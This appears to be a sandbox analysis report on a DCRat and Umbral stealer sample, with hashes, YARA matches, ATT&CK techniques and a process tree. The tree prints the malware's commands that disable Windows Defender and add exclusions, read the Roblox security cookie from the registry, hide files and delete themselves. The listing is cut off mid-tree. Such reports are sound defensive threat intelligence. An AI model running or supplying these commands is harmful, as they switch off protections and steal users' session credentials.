dcrat | f0198c0a0d120daa97da38b5c6d9c02084f643306729da7e5cf3fdfe436af05a

Analysis

max time kernel
138s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
14-06-2024 18:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Alpha.exe
Size

17.7MB
MD5

000049c16395549f6ee5d8d462ea999d
SHA1

f008c8c3edae6e5b934f4d21576aab437a32214a
SHA256

f0198c0a0d120daa97da38b5c6d9c02084f643306729da7e5cf3fdfe436af05a
SHA512

4a215294593191155c7425a96474b5fc52a9818b6068e4db9e8438f4db66615be8f8e8f7e78915b915f997df19e7379154c646af8a880d90b9b5e6a59828c68c
SSDEEP

393216:GZo6fE7woeA8SdC0kn3e6pNKm0jZ08PAcfQWV8fZhYxh0MFww0OO:GuJh8L0qOFmoAtNfjqh0MqO

Score

10^/10

dcrat umbral execution infostealer rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000400000002aa79-6.dat	family_umbral
behavioral2/memory/388-14-0x000001B8490D0000-0x000001B849110000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x000100000002aa85-21.dat	dcrat
behavioral2/files/0x000100000002aa89-139.dat	dcrat
behavioral2/memory/2216-141-0x0000000000940000-0x0000000000B12000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4524	powershell.exe
2996	powershell.exe
4660	powershell.exe
4640	powershell.exe
1524	powershell.exe
4528	powershell.exe
1820	powershell.exe
1940	powershell.exe
2740	powershell.exe
3384	powershell.exe
476	powershell.exe
4776	powershell.exe
1776	powershell.exe
1804	powershell.exe
4060	powershell.exe
4640	powershell.exe
4176	powershell.exe
2460	powershell.exe
4932	powershell.exe
1524	powershell.exe

Drops file in Drivers directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Executes dropped EXE 64 IoCs

pid	Process
388	Umbral.exe
2004	oxotana4iterov.exe
4656	Umbral.exe
4152	oxotana4iterov.exe
1720	Umbral.exe
1548	oxotana4iterov.exe
2216	UnZiper.exe
2300	Umbral.exe
720	oxotana4iterov.exe
2548	UnZiper.exe
2192	Umbral.exe
1904	oxotana4iterov.exe
1776	UnZiper.exe
2192	Umbral.exe
3552	oxotana4iterov.exe
4888	UnZiper.exe
4700	Umbral.exe
3280	oxotana4iterov.exe
1972	UnZiper.exe
3584	Umbral.exe
572	oxotana4iterov.exe
2636	UnZiper.exe
4780	Umbral.exe
4748	oxotana4iterov.exe
2988	UnZiper.exe
4156	Umbral.exe
1840	oxotana4iterov.exe
2192	UnZiper.exe
3384	Umbral.exe
240	oxotana4iterov.exe
4884	UnZiper.exe
3264	Umbral.exe
3900	oxotana4iterov.exe
5016	UnZiper.exe
2660	Umbral.exe
3248	UnZiper.exe
1488	oxotana4iterov.exe
3928	Umbral.exe
1608	oxotana4iterov.exe
2804	UnZiper.exe
976	Umbral.exe
2684	oxotana4iterov.exe
3760	UnZiper.exe
1376	Umbral.exe
3020	oxotana4iterov.exe
3808	UnZiper.exe
908	Umbral.exe
4456	oxotana4iterov.exe
560	UnZiper.exe
2908	Umbral.exe
3184	UnZiper.exe
4472	oxotana4iterov.exe
4792	Umbral.exe
3172	oxotana4iterov.exe
2208	UnZiper.exe
3152	Umbral.exe
1904	oxotana4iterov.exe
2852	UnZiper.exe
2856	Umbral.exe
1348	oxotana4iterov.exe
4552	UnZiper.exe
2804	Umbral.exe
2988	oxotana4iterov.exe
3900	UnZiper.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
47	ip-api.com
58	ip-api.com
1	ip-api.com
3	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 19 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2720	wmic.exe
3772	wmic.exe
4752	wmic.exe
2192	wmic.exe
3624	wmic.exe
4140	wmic.exe
2728	wmic.exe
2884	wmic.exe
4884	wmic.exe
2744	wmic.exe
2832	wmic.exe
5108	wmic.exe
4176	wmic.exe
1956	wmic.exe
3152	wmic.exe
4812	wmic.exe
3972	wmic.exe
5108	wmic.exe
3252	wmic.exe

Modifies registry class 53 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe
Key created	\REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings	oxotana4iterov.exe

Runs ping.exe 1 TTPs 19 IoCs

Remote System Discovery

T1018

pid	Process
456	PING.EXE
5116	PING.EXE
4696	PING.EXE
3796	PING.EXE
4696	PING.EXE
476	PING.EXE
3796	PING.EXE
4660	PING.EXE
2872	PING.EXE
4728	PING.EXE
1920	PING.EXE
1464	PING.EXE
4928	PING.EXE
4764	PING.EXE
4904	PING.EXE
4544	PING.EXE
4704	PING.EXE
3848	PING.EXE
4176	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
388	Umbral.exe
2740	powershell.exe
2740	powershell.exe
3508	powershell.exe
3508	powershell.exe
1556	powershell.exe
1556	powershell.exe
232	powershell.exe
232	powershell.exe
3832	powershell.exe
3832	powershell.exe
2300	Umbral.exe
2300	Umbral.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
5108	powershell.exe
5108	powershell.exe
5108	powershell.exe
2828	powershell.exe
2828	powershell.exe
2828	powershell.exe
3620	powershell.exe
3620	powershell.exe
3620	powershell.exe
4420	powershell.exe
4420	powershell.exe
4700	Umbral.exe
3384	powershell.exe
3384	powershell.exe
3384	powershell.exe
1524	powershell.exe
1524	powershell.exe
1524	powershell.exe
456	powershell.exe
456	powershell.exe
3788	powershell.exe
3788	powershell.exe
1488	powershell.exe
1488	powershell.exe
1488	powershell.exe
4156	Umbral.exe
4156	Umbral.exe
476	powershell.exe
476	powershell.exe
476	powershell.exe
4728	powershell.exe
4728	powershell.exe
4728	powershell.exe
4748	powershell.exe
4748	powershell.exe
3224	powershell.exe
3224	powershell.exe
1328	powershell.exe
1328	powershell.exe
1328	powershell.exe
2660	Umbral.exe
2660	Umbral.exe
4776	powershell.exe
4776	powershell.exe
4776	powershell.exe
4932	powershell.exe
4932	powershell.exe
4932	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	388	Umbral.exe
Token: SeIncreaseQuotaPrivilege	1176	wmic.exe
Token: SeSecurityPrivilege	1176	wmic.exe
Token: SeTakeOwnershipPrivilege	1176	wmic.exe
Token: SeLoadDriverPrivilege	1176	wmic.exe
Token: SeSystemProfilePrivilege	1176	wmic.exe
Token: SeSystemtimePrivilege	1176	wmic.exe
Token: SeProfSingleProcessPrivilege	1176	wmic.exe
Token: SeIncBasePriorityPrivilege	1176	wmic.exe
Token: SeCreatePagefilePrivilege	1176	wmic.exe
Token: SeBackupPrivilege	1176	wmic.exe
Token: SeRestorePrivilege	1176	wmic.exe
Token: SeShutdownPrivilege	1176	wmic.exe
Token: SeDebugPrivilege	1176	wmic.exe
Token: SeSystemEnvironmentPrivilege	1176	wmic.exe
Token: SeRemoteShutdownPrivilege	1176	wmic.exe
Token: SeUndockPrivilege	1176	wmic.exe
Token: SeManageVolumePrivilege	1176	wmic.exe
Token: 33	1176	wmic.exe
Token: 34	1176	wmic.exe
Token: 35	1176	wmic.exe
Token: 36	1176	wmic.exe
Token: SeIncreaseQuotaPrivilege	1176	wmic.exe
Token: SeSecurityPrivilege	1176	wmic.exe
Token: SeTakeOwnershipPrivilege	1176	wmic.exe
Token: SeLoadDriverPrivilege	1176	wmic.exe
Token: SeSystemProfilePrivilege	1176	wmic.exe
Token: SeSystemtimePrivilege	1176	wmic.exe
Token: SeProfSingleProcessPrivilege	1176	wmic.exe
Token: SeIncBasePriorityPrivilege	1176	wmic.exe
Token: SeCreatePagefilePrivilege	1176	wmic.exe
Token: SeBackupPrivilege	1176	wmic.exe
Token: SeRestorePrivilege	1176	wmic.exe
Token: SeShutdownPrivilege	1176	wmic.exe
Token: SeDebugPrivilege	1176	wmic.exe
Token: SeSystemEnvironmentPrivilege	1176	wmic.exe
Token: SeRemoteShutdownPrivilege	1176	wmic.exe
Token: SeUndockPrivilege	1176	wmic.exe
Token: SeManageVolumePrivilege	1176	wmic.exe
Token: 33	1176	wmic.exe
Token: 34	1176	wmic.exe
Token: 35	1176	wmic.exe
Token: 36	1176	wmic.exe
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	232	powershell.exe
Token: SeIncreaseQuotaPrivilege	4672	wmic.exe
Token: SeSecurityPrivilege	4672	wmic.exe
Token: SeTakeOwnershipPrivilege	4672	wmic.exe
Token: SeLoadDriverPrivilege	4672	wmic.exe
Token: SeSystemProfilePrivilege	4672	wmic.exe
Token: SeSystemtimePrivilege	4672	wmic.exe
Token: SeProfSingleProcessPrivilege	4672	wmic.exe
Token: SeIncBasePriorityPrivilege	4672	wmic.exe
Token: SeCreatePagefilePrivilege	4672	wmic.exe
Token: SeBackupPrivilege	4672	wmic.exe
Token: SeRestorePrivilege	4672	wmic.exe
Token: SeShutdownPrivilege	4672	wmic.exe
Token: SeDebugPrivilege	4672	wmic.exe
Token: SeSystemEnvironmentPrivilege	4672	wmic.exe
Token: SeRemoteShutdownPrivilege	4672	wmic.exe
Token: SeUndockPrivilege	4672	wmic.exe
Token: SeManageVolumePrivilege	4672	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 456 wrote to memory of 388	456	Alpha.exe	79
PID 456 wrote to memory of 388	456	Alpha.exe	79
PID 456 wrote to memory of 2476	456	Alpha.exe	80
PID 456 wrote to memory of 2476	456	Alpha.exe	80
PID 456 wrote to memory of 2004	456	Alpha.exe	81
PID 456 wrote to memory of 2004	456	Alpha.exe	81
PID 456 wrote to memory of 2004	456	Alpha.exe	81
PID 2004 wrote to memory of 2828	2004	oxotana4iterov.exe	82
PID 2004 wrote to memory of 2828	2004	oxotana4iterov.exe	82
PID 2004 wrote to memory of 2828	2004	oxotana4iterov.exe	82
PID 388 wrote to memory of 1176	388	Umbral.exe	83
PID 388 wrote to memory of 1176	388	Umbral.exe	83
PID 388 wrote to memory of 1196	388	Umbral.exe	86
PID 388 wrote to memory of 1196	388	Umbral.exe	86
PID 388 wrote to memory of 2740	388	Umbral.exe	88
PID 388 wrote to memory of 2740	388	Umbral.exe	88
PID 388 wrote to memory of 3508	388	Umbral.exe	90
PID 388 wrote to memory of 3508	388	Umbral.exe	90
PID 388 wrote to memory of 1556	388	Umbral.exe	92
PID 388 wrote to memory of 1556	388	Umbral.exe	92
PID 388 wrote to memory of 232	388	Umbral.exe	94
PID 388 wrote to memory of 232	388	Umbral.exe	94
PID 2476 wrote to memory of 4656	2476	Alpha.exe	96
PID 2476 wrote to memory of 4656	2476	Alpha.exe	96
PID 2476 wrote to memory of 4660	2476	Alpha.exe	97
PID 2476 wrote to memory of 4660	2476	Alpha.exe	97
PID 2476 wrote to memory of 4152	2476	Alpha.exe	98
PID 2476 wrote to memory of 4152	2476	Alpha.exe	98
PID 2476 wrote to memory of 4152	2476	Alpha.exe	98
PID 4152 wrote to memory of 3620	4152	oxotana4iterov.exe	99
PID 4152 wrote to memory of 3620	4152	oxotana4iterov.exe	99
PID 4152 wrote to memory of 3620	4152	oxotana4iterov.exe	99
PID 388 wrote to memory of 4672	388	Umbral.exe	100
PID 388 wrote to memory of 4672	388	Umbral.exe	100
PID 388 wrote to memory of 4724	388	Umbral.exe	102
PID 388 wrote to memory of 4724	388	Umbral.exe	102
PID 388 wrote to memory of 4840	388	Umbral.exe	104
PID 388 wrote to memory of 4840	388	Umbral.exe	104
PID 388 wrote to memory of 3832	388	Umbral.exe	106
PID 388 wrote to memory of 3832	388	Umbral.exe	106
PID 388 wrote to memory of 4176	388	Umbral.exe	108
PID 388 wrote to memory of 4176	388	Umbral.exe	108
PID 4660 wrote to memory of 1720	4660	Alpha.exe	112
PID 4660 wrote to memory of 1720	4660	Alpha.exe	112
PID 4660 wrote to memory of 1260	4660	Alpha.exe	115
PID 4660 wrote to memory of 1260	4660	Alpha.exe	115
PID 4660 wrote to memory of 1548	4660	Alpha.exe	117
PID 4660 wrote to memory of 1548	4660	Alpha.exe	117
PID 4660 wrote to memory of 1548	4660	Alpha.exe	117
PID 388 wrote to memory of 2068	388	Umbral.exe	118
PID 388 wrote to memory of 2068	388	Umbral.exe	118
PID 1548 wrote to memory of 3252	1548	oxotana4iterov.exe	120
PID 1548 wrote to memory of 3252	1548	oxotana4iterov.exe	120
PID 1548 wrote to memory of 3252	1548	oxotana4iterov.exe	120
PID 2828 wrote to memory of 5100	2828	WScript.exe	121
PID 2828 wrote to memory of 5100	2828	WScript.exe	121
PID 2828 wrote to memory of 5100	2828	WScript.exe	121
PID 2068 wrote to memory of 4928	2068	cmd.exe	123
PID 2068 wrote to memory of 4928	2068	cmd.exe	123
PID 5100 wrote to memory of 2216	5100	cmd.exe	125
PID 5100 wrote to memory of 2216	5100	cmd.exe	125
PID 1260 wrote to memory of 2300	1260	Alpha.exe	126
PID 1260 wrote to memory of 2300	1260	Alpha.exe	126
PID 3620 wrote to memory of 4720	3620	WScript.exe	127

Views/modifies file attributes 1 TTPs 20 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5040	attrib.exe
2272	attrib.exe
4724	attrib.exe
3772	attrib.exe
4720	attrib.exe
3808	attrib.exe
3644	attrib.exe
1860	attrib.exe
2852	attrib.exe
1776	attrib.exe
1484	attrib.exe
3400	attrib.exe
1196	attrib.exe
3016	attrib.exe
3264	attrib.exe
4204	attrib.exe
2120	attrib.exe
1820	attrib.exe
4004	attrib.exe
3228	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Alpha.exe
"C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:456
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:388
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1176
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:1196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:232
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4672
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4724
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4840
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3832
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4176
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2068
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:4928
- C:\Users\Admin\AppData\Local\Temp\Alpha.exe
  "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2476
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Executes dropped EXE
    PID:4656
- - C:\Users\Admin\AppData\Local\Temp\Alpha.exe
    "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4660
  - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Executes dropped EXE
      PID:1720
  - - C:\Users\Admin\AppData\Local\Temp\Alpha.exe
      "C:\Users\Admin\AppData\Local\Temp\Alpha.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1260
    - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2300
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:4956
      - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        6⤵
        Views/modifies file attributes
        
        PID:5040
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1776
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5108
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2828
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3620
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        6⤵
        
        PID:2572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2548
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        6⤵
        
        PID:4464
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:2076
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4420
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:2744
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        6⤵
        
        PID:2132
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        7⤵
        Runs ping.exe
        
        PID:4660
    - - C:\Users\Admin\AppData\Local\Temp\Alpha.exe
        
